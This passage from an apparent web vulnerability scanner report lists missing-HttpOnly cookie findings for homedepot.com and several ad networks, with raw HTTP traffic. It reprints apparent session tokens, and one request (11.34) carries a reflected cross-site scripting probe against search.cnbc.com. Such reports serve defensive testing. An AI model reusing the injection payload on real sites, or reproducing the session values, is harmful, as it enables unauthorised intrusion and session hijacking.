wcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response

11.26. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemAddService previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/OrderItemAddService

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227739722%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cYAeXFdjXVbkwxwNU3QRHbu8%2f1Ko%3d;Domain=.homedepot.com;Path=/
THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224133796%3a%3bC25%5fEXP%3d1360064133%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:35:33 GMT;Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 140
Expires: Thu, 16 Jun 2011 11:35:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:35:39 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224133796%3a%3bC25%5fEXP%3d1360064133%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:35:33 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227739722%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cYAeXFdjXVbkwxwNU3QRHbu8%2f1Ko%3d;Domain=.homedepot.com;Path=/

{"ItemsAdded":[],"ItemsAddFailure":[{"CatEntryId":"202642971","ProductName":"1","ErrorMessage":"No Inventory"}]}

11.27. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemDisplay previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/OrderItemDisplay

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630917%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cDh3V6mSqM3U%2bN9D0AIqw32W81OA%3d;Domain=.homedepot.com;Path=/
THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030890%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:33:50 GMT;Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Moved Temporarily
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Location: http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 16 Jun 2011 11:33:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:33:50 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030890%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:33:50 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630917%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cDh3V6mSqM3U%2bN9D0AIqw32W81OA%3d;Domain=.homedepot.com;Path=/

11.28. http://www.homedepot.com/webapp/wcs/stores/servlet/QuickViewService previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/QuickViewService

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

WC_USERSESSION_-1002=%2d1002%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002025830%5d%2c84UkZ5wI%2fVfXz0TN8b05L8WU9Mc%3d;Domain=.homedepot.com;Path=/
THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224000530%3a%3bC25%5fEXP%3d1360064000%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:33:20 GMT;Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.29. http://www.ilslaunch.com/skyterra-1-mission-control previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.ilslaunch.com
Path:	/skyterra-1-mission-control

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESS8d393e05f9096e5159d3f1d85acb4aa2=663g8gh6rfesig5han0apvb014; expires=Sat, 09 Jul 2011 14:24:11 GMT; path=/; domain=.ilslaunch.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.30. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

480-SM=adver_06-16-2011-11-53-17; expires=Sun, 19-Jun-2011 12:05:38 GMT; path=/; domain=c3metrics.com
480-VT=adver_06-16-2011-12-05-38_7521471101308225938; expires=Tue, 14-Jun-2016 12:05:38 GMT; path=/; domain=c3metrics.com
480-nUID=adver_7521471101308225938; expires=Thu, 16-Jun-2011 12:20:38 GMT; path=/; domain=c3metrics.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225195243&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-VT=adver_05-21-2011-12-34-28_14859001441305981268; SERVERID=s3

Response

11.31. http://a.amxdt.com/px/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.amxdt.com
Path:	/px/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cookieid=143e8f5d019e131479f1a63b15b4928070498;Domain=.amxdt.com;Expires=Sat, 16-Jun-2012 10:39:50 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.32. http://a.rfihub.com/cm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.rfihub.com
Path:	/cm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

a2=7226644042610287825;Path=/;Domain=.rfihub.com;Expires=Thu, 12-Jun-2031 10:12:02 GMT
j2=7226644042610287825;Path=/;Domain=.rfihub.com
t1=1308305522310;Path=/;Domain=.rfihub.com;Expires=Thu, 12-Jun-2031 10:12:02 GMT
u="aABrI-S9g==AI89bBrQ==AAABMJ0V_oc=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:12:02 GMT;Max-Age=47347200
a=c615022824147045895;Path=/;Domain=.rfihub.com;Expires=Thu, 12-Jun-2031 10:12:02 GMT
j=c615022824147045895;Path=/;Domain=.rfihub.com
o=1-emLGD8YOQiy1;Path=/;Domain=.rfihub.com;Expires=Thu, 12-Jun-2031 10:12:02 GMT
p=1-emLGD8YOQiy1;Path=/;Domain=.rfihub.com
r=1305209924560;Path=/;Domain=.rfihub.com;Expires=Thu, 12-Jun-2031 10:12:02 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.33. http://a.rfihub.com/cm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.rfihub.com
Path:	/cm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

a1=1CAESEA0pzwV4-SdN2wuhHcO4rdI;Path=/;Domain=.rfihub.com;Expires=Thu, 12-Jun-2031 10:12:00 GMT
j1=1CAESEA0pzwV4-SdN2wuhHcO4rdI;Path=/;Domain=.rfihub.com
t=1308305520137;Path=/;Domain=.rfihub.com;Expires=Thu, 12-Jun-2031 10:12:00 GMT
u="aABrH4vzA==AI89bBrQ==AAABMJ0V9gk=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:12:00 GMT;Max-Age=47347200
a=c615022824147045895;Path=/;Domain=.rfihub.com;Expires=Thu, 12-Jun-2031 10:12:00 GMT
j=c615022824147045895;Path=/;Domain=.rfihub.com
o=1-emLGD8YOQiy1;Path=/;Domain=.rfihub.com;Expires=Thu, 12-Jun-2031 10:12:00 GMT
p=1-emLGD8YOQiy1;Path=/;Domain=.rfihub.com
r=1305209924560;Path=/;Domain=.rfihub.com;Expires=Thu, 12-Jun-2031 10:12:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.34. http://a.rfihub.com/sed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.rfihub.com
Path:	/sed

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

g="aADDdMBBg==BCaXVrKKr3qCt76|19789|90461|1862541|19370|1504|101707|445|51259|8661AAABMJ0V4HA=BCaqN5EtAqqMvGW|19789|90461|1862541|19370|1504|101707|445|51259|8661AAABMJ0V31g=BCan85n-7WKY7Ss|20285|92765|1041137|18405|1518|101707|445|43622|8722AAABL-SS69E=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:11:54 GMT;Max-Age=47347200
u="aABrHtwfA==AI89bBrQ==AAABMJ0V4HA=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:11:54 GMT;Max-Age=47347200
c="aAMAMJ_Rg==AFd1504AB2AAABMJ0V4HA=AFv3788AB2AAABMJ0V4HA=AGu23252AB2AAABMJ0V4HA=AGt23252AB2AAABMJ0V4HA=AGb19789AB2AAABMJ0V4HA=AGa19789AB2AAABMJ0V4HA=AFd1518AB1AAABL-SS69A=AFv3828AB1AAABL-SS69A=AGu23820AB1AAABL-SS69A=AGt23820AB1AAABL-SS69A=AGb20285AB1AAABL-SS69A=AGa20285AB1AAABL-SS69A=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:11:54 GMT;Max-Age=47347200
f="aADF8vybA==AK1308305514AB2AAABMJ0V4HA=AK1305643118AB2AAABL_5mTvc=AK1305209924AB1AAABL-SS69A=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:11:54 GMT;Max-Age=47347200
s="aAC0rUkZw==AE9479AN1294103956000AAABMJ0V4HA=AE8438AN1275963655000AAABMJ0V31c=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:11:54 GMT;Max-Age=47347200

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sed?w=300&h=250&re=12387&pv=0&ra=3055140830.8481068485217647&rb=445&ca=&rc=&rd=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBGZxhZij7TY_LHIuY6QbcnsjECc-Bso8Cj9qbsyKb7MqEJwAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi01NjcyNTU3NDU3ODM0NDU0oAGz7MfrA7IBD3NlYXJjaC5jbmJjLmNvbboBCjMwMHgyNTBfYXPIAQnaAZ8BaHR0cDovL3NlYXJjaC5jbmJjLmNvbS9tYWluLmRvP3RhcmdldD1hbGwma2V5d29yZHM9eHNzM2EzNGIlM0Mvc2NyaXB0JTNFJTNDc2NyaXB0JTNFYWxlcnQoMSklM0Mvc2NyaXB0JTNFN2M1ZmE1NGJhMzZjY2E2OCZjYXRlZ29yaWVzPWV4Y2x1ZGUmc2VhcmNoYm94aW5wdXQ9eHNzmALyEcACBMgCze_PDqgDAfUDAgAARPUDIAAAAIAGocWLibeSzNGRAQ%2526num%253D1%2526sig%253DAGiWqtxiB7PhdyqkGidLM7p1mIFKK9-TJg%2526client%253Dca-pub-5672557457834454%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre3055140816039&pb=&pc=&pd=&pg=&ct=1308305514083&co=false&ep=TfsoZgAHJY8K2kwLmJIPXHR4qq0JxG4Pwd52ow&ri=4dfb286607258fada4cb9892f5c1&rs=4355cd3c1f5990ce.anonymous.google&ai=19789&rt=23252&pe=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Ftarget%3Dall%26keywords%3Dxss3a34b%253C%2Fscript%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E7c5fa54ba36cca68%26categories%3Dexclude%26searchboxinput%3Dxss&pf=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: a.rfihub.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68&categories=exclude&searchboxinput=xss
Cookie: g="aABgmj8uw==BCan85n-7WKY7Ss|20285|92765|1041137|18405|1518|101707|445|43622|8722AAABL-SS69E="; c="aAGG0IReg==AFd1518AB1AAABL-SS69A=AFv3828AB1AAABL-SS69A=AGu23820AB1AAABL-SS69A=AGt23820AB1AAABL-SS69A=AGb20285AB1AAABL-SS69A=AGa20285AB1AAABL-SS69A="; s="aAC7BDsnw==AE9479AN1294103956000AAABL-SS69A=AE8438AN1275963655000AAABL-SS69A="; a1=1CAESEA0pzwV4-SdN2wuhHcO4rdI; t=1305209963284; a2=2724386019227846218; t1=1305209966477; a=c615022824147045895; o=1-emLGD8YOQiy1; r=1305209924560; m="aAC4IU7vg==AI20474259AAABL_5mTvg=AI20474259AAABL_5k7_k="; u="aABpVi0zA==AI89bBrQ==AAABL_5mTvg="; f="aAC9KJdew==AK1305643118AB2AAABL_5mTvc=AK1305209924AB1AAABL-SS69A="; e=cb

Response

11.35. http://a.rfihub.com/tk.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.rfihub.com
Path:	/tk.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

u="aABrI9nPw==AI89bBrQ==AAABMJ0V_e0=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:12:02 GMT;Max-Age=47347200

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.36. http://a.tribalfusion.com/i.match previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/i.match

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=amnDNYy4ZaEexMeqAZbwej4ygEvy92VwWWd1ma2ZaFUeZcH65h7duwY9kh55MntlJRfLTZbZdAxjJ4INHcML4ZdjUjSqHZdc11ZcGqJOCRCB4kBCFFrlTexZb3kdS42Id5NHWT0S5n4eJ9c4J2LK6ZdngrGxKHZdm6QsjCEu9m64ZcfSZanpY3twRyVRmbe1ag1ecYHl62g6mswdwg3vdibpyhGM9vBRmC9ptHZaeHWE3mNpnWWfaHtYMFcaehxZdQ57509jA0P3bicEK2iB1plJuLAZb8PcrKJ7IIT8ce55xY3ZbOTOkvZcHZcZcOZc3v1uuhIpTgZaU5kusHedWlyy5RIaCObZckX84fSy84vQsZcEmU7CgqaCS2k1iW1fESxg6RV4aGbZaxNOxQqsgqCNXRNhZdtaMpjxNgihNfxrrutT5PC3ALXPa8X8nfWSjkZa800GCNWK7gOZaZdipYei0fkZaZbIQRowITTQESt2Jvi2w7c3mPgDmLkniFFwpRONZdlSiys6mWQL056evGFhGggoFKDInTVOmUYZdS86J9j0RK9f3C3G4AfmTbCFBZcY3aGaHGaiFNZbfI2Y; path=/; domain=.tribalfusion.com; expires=Wed, 14-Sep-2011 14:08:59 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.37. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=arnhZb5NZaiMsmmemKmCgor4YaQXE6RAWKI8UAB9Lcni6D3W6FCquFPctEv7K0QZd5HK33UBp2mGKPbZc0jt4y8GmrZcXgCq7lWbcvE4Grn74AoEpKKXesveInly0ddXUUHc9ZbfqKIo2bmkJtPKJPvD5BMy2bB09PiTecC5nQmUxWIZcaOJNOB6JARCdpnpYii6JHAffrfYD3yCeZbWe3qrifZdZbZcvc9qxZdv03o31HZbZa6bEC3LCiFrCpUd0lwm5BR2ZbIJ5BiACRq7G8Zan8Vv4h48bQvfSu1r8j9pZaIUq0E1PFUAFm8ulDW9WU6Jlb3Zcyij9r3rKKV662BSghZbZbpdZbaObJBtMlIbjA8bMmWtV4C6rqmmWkEhJiIuhcEQWwlokAyQbcHdfKPa0pbhGOxcjYgxqWMJCX4W3XlUdtE5JIVU1LI1i7i0lmha4JYDZbO52XaZbo0opMYVl6j4xn3uwUr3xl9TtNGuZbAAkwaIu8oS; path=/; domain=.tribalfusion.com; expires=Wed, 14-Sep-2011 12:06:28 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.38. http://a1.interclick.com/ColDta.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a1.interclick.com
Path:	/ColDta.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tpd=e20=1308573230578&e90=1308838755219&e50=1308573231659&e100=1308838755889; domain=.interclick.com; expires=Sat, 16-Jul-2011 14:22:27 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.39. http://a1.interclick.com/Segment.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a1.interclick.com
Path:	/Segment.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734279&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293&8170=734303&202=734303; domain=.interclick.com; expires=Wed, 16-Jun-2021 11:32:15 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.40. http://a1.interclick.com/getInPageJSProcess.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a1.interclick.com
Path:	/getInPageJSProcess.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FC_53=167861=17623304:3; domain=.a1.interclick.com; expires=Fri, 17-Jun-2011 14:17:10 GMT; path=/
IFC=n=3&w13501=3&a167861=3&e=634438973595758677; domain=.a1.interclick.com; expires=Fri, 17-Jun-2011 12:49:19 GMT; path=/
Aqprep_Banner728X90=154840=634415637907052842:50930&157035=634420788550214247:51744&167861=634438162303182581:13501; domain=.a1.interclick.com; expires=Wed, 14-Sep-2011 14:17:10 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /getInPageJSProcess.aspx?a=53&b=13501&cid=1240946772498&isif=t&rurld=www.cnbc.com&sl=false&dvp=http%3A//www.cnbc.com/id/43422860&rurl=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860 HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308233637262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=8fb5e3ac-83a3-4cca-8da7-7f2e4e96648c; tpd=e20=1308573230578&e90=1306586030476&e50=1308573231659&e100=1306586032110; Aqprep_Banner160X600=157033=634420788549939172:51744; Aqprep_Banner300X250=157034=634420788548305005:51744&161467=634415638953988496:51417; sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734279&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293; ucap=sl=0; FC_53=167861=17623304:1; IFC=n=1&w13501=1&a167861=1&e=634438973595758677; Aqprep_Banner728X90=154840=634415637907052842:50930&157035=634420788550214247:51744&167861=634438109595788677:13501; Li=1=734303&30=734277

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ucap=sl=0; domain=.a1.interclick.com; expires=Sun, 26-Jun-2011 14:17:10 GMT; path=/
Set-Cookie: FC_53=167861=17623304:3; domain=.a1.interclick.com; expires=Fri, 17-Jun-2011 14:17:10 GMT; path=/
Set-Cookie: IFC=n=3&w13501=3&a167861=3&e=634438973595758677; domain=.a1.interclick.com; expires=Fri, 17-Jun-2011 12:49:19 GMT; path=/
Set-Cookie: Aqprep_Banner728X90=154840=634415637907052842:50930&157035=634420788550214247:51744&167861=634438162303182581:13501; domain=.a1.interclick.com; expires=Wed, 14-Sep-2011 14:17:10 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Thu, 16 Jun 2011 14:17:10 GMT
Content-Length: 3286

